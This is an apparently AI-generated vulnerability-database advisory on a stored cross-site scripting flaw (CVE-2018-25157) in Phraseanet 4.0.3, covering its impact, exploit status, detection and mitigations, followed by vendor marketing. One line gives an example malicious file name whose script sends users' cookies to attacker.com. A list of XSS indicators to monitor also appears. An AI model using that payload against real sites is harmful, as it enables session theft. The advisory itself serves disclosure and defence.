
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2018-25157 is a stored cross-site scripting (XSS) vulnerability in Phraseanet 4.0.3, a digital asset management platform. Authenticated attackers can inject malicious scripts by uploading documents with crafted file names containing embedded SVG scripts, which execute in the browser when the file is viewed by other users. The vulnerability was published to the GitHub Advisory Database on February 11, 2026, and affects the phraseanet/phraseanet Composer package at version 4.0.3. It carries a CVSS v3.1 base score of 6.4 (Medium) and a CVSS v4.0 base score of 5.1 (Medium) (GitHub Advisory).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically a stored XSS variant. Phraseanet 4.0.3 fails to sanitize or validate file names during the document upload process, allowing an authenticated user to upload a file whose name contains embedded SVG script content. When another user subsequently views or browses the uploaded file, the malicious script executes in their browser context. A public exploit is referenced on Exploit-DB (EDB-46935), indicating that technical details and a proof-of-concept have been publicly disclosed (GitHub Advisory).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser of any user who views the maliciously named file, enabling session cookie theft, credential harvesting, and unauthorized redirection to attacker-controlled sites. Because the payload is stored server-side and triggered on file view, it can affect multiple victims without further attacker interaction. The scope is changed (S:C in CVSS), meaning the impact extends beyond the vulnerable component to the browsers of other authenticated users, with low confidentiality and integrity impact and no availability impact (GitHub Advisory).
A public exploit for this vulnerability is available on Exploit-DB (EDB-46935), indicating the vulnerability has been weaponized to at least a proof-of-concept level (GitHub Advisory). The EPSS score is approximately 0.024% (11th percentile), suggesting a low but non-zero probability of active exploitation in the near term. No evidence of in-the-wild exploitation, threat actor attribution, or CISA KEV catalog listing has been identified for this CVE.
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.svg or a similarly crafted name that Phraseanet stores without sanitization.Referer headers pointing to Phraseanet pages in external server logs.<script>, <svg>, onerror=, javascript:, or similar XSS indicators.As of the advisory publication date (February 11, 2026), no patched version of phraseanet/phraseanet has been identified — the GitHub Advisory lists "None" for patched versions (GitHub Advisory). Organizations should apply strict input validation and output encoding for file names in the document upload workflow as a compensating control. Additionally, restricting upload privileges to trusted users only, implementing a Content Security Policy (CSP) to limit script execution, and monitoring uploaded file names for script-like content can reduce risk until an official patch is released.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."